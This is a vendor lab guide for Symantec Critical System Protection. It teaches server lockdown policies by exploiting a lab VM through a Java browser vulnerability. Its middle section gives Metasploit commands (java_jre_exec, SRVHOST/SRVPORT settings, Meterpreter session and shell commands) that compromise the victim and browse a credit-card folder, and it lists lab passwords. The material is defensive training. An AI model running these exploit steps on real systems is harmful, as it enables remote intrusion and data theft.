IS L06 Protect Servers and Defend Against APTs with Symantec Critical System Protection

IS L06 Protect Servers and Defend Against APTs with Symantec Critical System Protection Description Lab flow At the end of this lab, you should be able to Discover how to harness the power and capabilities of Symantec Critical System Protection. This lab will demonstrate how CSP can be used to protect your critical servers against APT. APT s take advantage of vulnerabilities found in systems. These vulnerabilities are often ones that have not been patched and identified by software vendors. Once a system has been compromised the cybercriminal will use that system to attack other systems in the environment. CSP offers prevention policies that provide OS and application lockdown. The policies can be used to control what applications can run on the system as well as govern their good behavior. Prevention Policies can also be used to control network access to and from a system. In this lab we ll do things a little bit differently and use CSP as Java Zero-Day exploit debugger to learn how CSP works and how these Zero-Day exploits are compromising the system. We ll use Backtrack and Metasploit to do the penetration testing part. 1. We ll construct basic policy that can used to uncover tasks that these exploits are doing behind the scenes. We also allow the exploit to happen first. You ll be using a system with CSP agent installed to browse a compromised web server that executes the exploit in your browser plug-in. 2. We ll start to add limitations and observe how these will effect to compromised applications running in sandboxes. 3. We ll block this Zero-Day exploit and all of its future variants for good. Understand how APT s take advantage of vulnerable systems Protect a server from exploit attacks Monitor for zero day attacks against a system Lock down intellectual property Prevent unauthorized applications from getting installed

Notes A brief presentation will introduce this lab session and discuss key concepts. The lab will be directed and provide you with step-by-step walkthroughs of key features. Thank you for coming to our lab session. Lab content Lab Orientation... 3 Constructing the initial policy... 7 Deploying the policy to CSP-Agent-01 server... 12 Testing the policy before using the penetration testing tools... 15 Using penetration testing tool to execute Java Zero-Day exploit in CSP system... 18 Blocking known and unknown APT s getting shell.... 27 Using CSP as Exploit Debugger... 32 2 of 40

Lab Orientation In this phase we ll learn to how to navigate in CSP manager and observe the places needed later. Boot your CSP Manager 5.2.9, Java Zero-Day and Backtrack VM s now if you have not done so already. Systems available for you: CSP Manager 5.2.9 VM IP address of 192.168.10.10 Will show up in CSP manager as CSP-Manager Java Zero-Day VM IP address of 192.168.10.9 Will show up in CSP manager as CSP-Agent-01 Penetration testing tool Backtrack VM IP address of 192.168.10.250 Login accounts and passwords for the systems CSP Manager server: administrator Symc4now! Java Zero-Day server: administrator Symc4now! Backtrack penetration testing tool: root toor Login accounts and passwords for the applications CSP Manager: symadmin Symc4now! 3 of 40

Access the CSP manager Click the management console icon from the desktop Login to the CSP Manager 5.2.9 system and then login to the CSP console with username symadmin and password Symc4now! Click Assets and Prevention view Browse around and get familiar about your assets. You be assigning policies to these assets later. CSP-Agent-01 would be your system containing Java Zero- Day vulnerable software 4 of 40

Click Policies tab and prevention polices Browse around and get familiar about your policies. You ll be using these policies later with CSP-Agent-01. Click Home and prevention view Click CSP-Agent-01. These are the event coming from the CSP-Agent-01 system. You may sort the events as you wish. We ll be using these views later to complete the lab. 5 of 40

6 of 40

Constructing the initial policy In this phase we ll construct a simple policy that will block access to a single folder even though the system has been fully compromised over the network or locally from console. We ll observe how sandboxing limitations apply, because the application has been broken inside of the sandbox. Go to the Policy Tab Browse under Symantec folder Right click sym_win_protection_strict_sbp that has minimum agent version 5.2.9 and click copy policy Rename the policy to Java_sym_win_protection_strict_sbp by right clicking it. Open the policy by double click or right click by selecting edit policy. 7 of 40

Click Agent Event Viewer row and add allow all users to run Agent Event viewer. Usually in production environments you ll select a restricted user or groups only to use this option. 8 of 40

Click OK Select Global Policy Options from the policy front page Enable Inbound host list and click edit Click Add and add 192.168.10.0/24 network Repeat this network add for outbound host list Note that at the moment we ll intentionally leave the firewall half open by not setting the outbound default to deny. 9 of 40

Click General settings Click File Rules. Enable No-Access resource list and add resource path D:\creditcardinfo\* 10 of 40

Observe that you have very granular ways to filter these in CSP policy. Click Apply to submit changes Select update revision Go back to policy home page Click Changes from base and observe what you have changed in the policy Finally click OK. 11 of 40

Deploying the policy to CSP-Agent-01 server In this phase we ll deploy the initial policy to the agent. Right click the policy that you just created and select apply policy Apply Policy Wizard will open Double click policy and select CSP Agents Click Next 12 of 40

Select Take the new option settings Select Finish. Go to Asset view. Under Prevention and CSP Agents you should see small red flag that agent is taking the policy. 13 of 40

If you select the green refresh button at the right upper corner of the screen, the flag should disappear soon. 14 of 40

Testing the policy before using the penetration testing tools In this phase we ll observe some of the limitation that the policy will apply. Logon to CSP-Agent-01 with account administrator and Symc4now! password Select start -> Run and type cmd Type whoami to verify that you are system administrator Use explorer and browse to d:\creditcardinfo folder and try to open cards.txt 15 of 40

Under Start -> all Programs browse to Symantec Critical system Protection and open event viewer Observe red warnings generated while you tried to open the file. Click entries to get more info and see that full information what has happened is available for you. 16 of 40

Note that Process Set is the sandbox where this event has happened. It is important to understand that everything in the system runs in sandboxes. These sandboxes have Behavior Control Descriptions attached so we can still control what the applications are doing while they are executed. Leave Event Viewer open and browse to c:\temp folder Right click and create new txt file Try to rename this as an.exe and observe Event Viewer information 17 of 40

Using penetration testing tool to execute Java Zero-Day exploit in CSP system In this phase we ll use Metasploit to penetrate the system. Metasploit will create malicious web server that will send exploit to your web browser and exploit will compromise your Java plug-in. We ll use CSP to monitor what is happening and allow Java Zero-Day exploit to happen leading system to be compromised. We ll observe how sandboxing limitations will apply even that the application has compromised inside of the sandbox. Start Backtrack5r3 VM if you have not already started. Login root and use password toor After login type startx NOTE! VMware cloning may change the network adapters settings so double check that your Backtracks network is working properly by pinging 192.168.10.10 which is your CSP manager. Also if you are planning to later install your own Backtrack this would be helpful information that you can setup a fixed IP. If ping is not working open terminal by clicking terminal icon at the top bar Type o Ip addr And observe the output you should see 192.168.10.255 ip address. If you are not seeing 192.168.10.250 you need to edit the /etc/network/interfaces file Most like eth0 has been changed to eth1 etc. From top bar select places and computer. Browse to interfaces file and change the settings as needed 18 of 40

Type o /etc/init.d/networking restart In terminal Check that you Backtrack network is working by pinging 192.168.10.10 you CSP manager. Start Metasploit by double clicking msfconsole icon on the desktop Note that console will take some time to load usually. 19 of 40

When you have the Metasploit console open type o use exploit/multi/browser/java_jre_exec Note that you may use tab auto fill the line o Press enter 20 of 40

Type o show options To study the option available for you regarding this exploit. We ll set some basic options to this exploit. o set SRVHOST 192.168.10.250 o set SRVPORT 80 o set URIPATH jre o show options Verify that defaults have been changed. 21 of 40

type o exploit To start the malicious web server. 22 of 40

move back to CSP-Agent-01 server. open Event Viewer if not open already. clear the view by selecting view from top pane and clear. open Internet Explorer via start menu. observe to what sandbox Internet Explorer is assigned. 23 of 40

Browse to that attacking web page by typing http://192.168.10.250/jre to URL path. Observe that in Event Viewer, there is much activity being generated also note which sandbox is Java assigned by default. Try to find the following event where you can see the metasploit.payload. Also note that we are allowing this exploit to happen so we can study it later. Move back to Metasploit console. You should see something like this: 24 of 40

Observe the number of session opened by looking the row Meterpreter session xx opened. Attach yourself to this session. Type sessions i [session number you are seeing] o sessions i 1 You have now successfully breached the box. CSP is monitoring the situation while we have not configured anything special to the policy. Java has compromised but it will say inside of the sandbox. Let s test this! Type o o o d: o o Shell whoami cd creditcardinfo dir Observe that even though the application has been compromised and you have gained administrative access to the system, CSP limitations will still apply. Move to CSP Manager and click Home, Prevention and CSP-Agent-01 to see events from the agent system. 25 of 40

In this example we created simple policy that allowed the exploit to happen but contained it with minimal limitations inside of the default interactive application sandbox. You also learned that penetration testing or hacking is not a rocket science and tools are widely and freely available for anyone to download and use. We used a free distribution of Backtrack that contains huge amount of security testing related tools. Backtrack can be downloaded from http://www.backtrack-linux.org/. 26 of 40

Blocking known and unknown APT s getting shell access. In this phase we ll modify the previous policy and block Meterpreter or any other penetration testing tool from gaining shell access. We ll be modifying the default interactive application sandbox (int_stdpriv_ps) so that every known and unknown type of vulnerability cannot breach your server. Most of the operating system components and application will be executed under this int_stdpriv_ps sandbox (sometimes referred to as the Default Sandbox). It is good place to prevent this type of attack although it is already well confined. Naturally you can make exceptions for applications and users if needed and please observe during this section what type of options are available for you while creating limitations. Power of CSP is that you really do not need to know what the bad things are in advance. Those will be handled by default sandbox properly. The only thing you need to know is what they may be after e.g. your confidential information mainly and some operating system components like shell or your bespoke application etc. Result of this part of the lab is that you ll have comprehensive protection against all known or unknown targeted attacks and ATP s. We ll also observe how these sandboxing limitations will apply even that the application has broken inside of the sandbox and some foothold has been gained. Let s proceed! Move back to your CSP manager VM. Open up your Java policy. Java was assigned by default to int_stdpriv_ps that is the default sandbox for the all unknown interactive applications. Let s change some of the settings around that sandbox. Click Process Sets at policy homepage. 27 of 40

Click Process Sets at policy homepage and spend some time to browse through these built-in sandboxes. Click Edit in Default Interactive Program Options at the bottom of the page. Navigate to File Rules and add No-Access entry for *\cmd.exe 28 of 40

Save policy and assign it to CSP-Agent-01 server You may select Reapply the policy this time and take the new settings. Move to Backtrack VM and restart your attack using instructions given previously. Just close the terminal and start Metasploit again entering the information as before. Move to CSP-Agent-01 server and close the IE and clear the Event Viewer events. Browse to the http://192.168.10.250/jre Move back to Backtrack image and hit enter 29 of 40

Notice that application is breaking again and you session is established. This is normal. Attach yourself to newly established session with Sessions i 1 Type o shell Observe that Meterpreter is unable to give the shell ( Operation Failed message) because it cannot break through the sandbox and its limitations. 30 of 40

Browse the related event from CSP manager and agent Event Viewer. Can you open the shell from CSP-Agent-01 as administrator by using start menu and running CMD? At the end close the Internet Explorer from CSP-Agent-01 VM and Metasploit console from Backtrack VM. In this section we created simple policy that will prevent current and future attacks against the windows shell. The logic is identical if you use UNIX or Linux type of platforms. We also controlled the administrators access to the command prompt while we assumed that in this case they could be malicious administrators. CSP offer granular options to control everything that is running in the system and this was just a brief demo around that. 31 of 40

Using CSP as Exploit Debugger In this phase we ll modify the previous policy and build a custom sandbox for the Java engine; by default it is executed under the default sandbox. This way we can granularly control the Java engine behavior. In this exercise we are interested in closely monitoring how the Java behaves when it is compromised and learn how targeted attacks are penetrating your networks. Before proceeding reboot the Java Zero-Day exploit VM- the VM you used to browse to vulnerable web page while it may have Meterpreter still running. Move back to CSP manager and open the Java policy you created earlier. Click Process Sets at policy homepage. Move under Default Interactive Program Option and modify the previous File Rule. Remove *\cmd.exe that you entered previously. At the policy home page click My Custom Programs. Click green plus sign to add custom control. Type Java to display name box and same for identifier name box. Leave This program is Interactive as is while Java is interactive application. Select Finish. Edit the newly created sandbox by selecting edit. 32 of 40

Observe the default settings of this sandbox. Select Specify Interactive Programs with Custom privileges check box and select edit. Select add and add C:\Program Files (x86)\java\* path. This will reroute all the interactive applications started under this path to this sandbox. 33 of 40

Select file Rules Add the following limitations to No-Access resource list o C:\Users\*\AppData\Local\Temp\* o c:\windows\* You can use system variables if you wish 34 of 40

Move back to My custom Programs and disable prevention of this sandbox by flipping the green slider to red. 35 of 40

Save and reapply the with these new settings policy. Move to the Backtrack Server VM and restart the attack with previously given instructions. Move to CSP-Agent-01 server and again browse to web page that is breaking the Java. You should see lot of events in Event Viewer. 36 of 40

Move back to Backtrack VM Attach yourself to the Meterpreter session with sessions i [session number you are seeing] Type first ps and then shell 37 of 40

Move back to CSP manager Go to Monitors, Events, Prevention 38 of 40

Let s examine some of the events generated by this attack and try to learn how thing will break behind the scenes. Locate the temp file created by the exploit Locate the event caused by you asking Meterpreter to give shell. 39 of 40

Can you locate the event where hidden applications are moved to your system via encrypted channel and they are only present in memory? Generally applications, users and services have far too much access to the operating system by default and these permissions allow them to be used as tools to gain access to your system by hackers and malicious insiders. With CSP you can effectively stop that via policy. End of Lab - Thank you! 40 of 40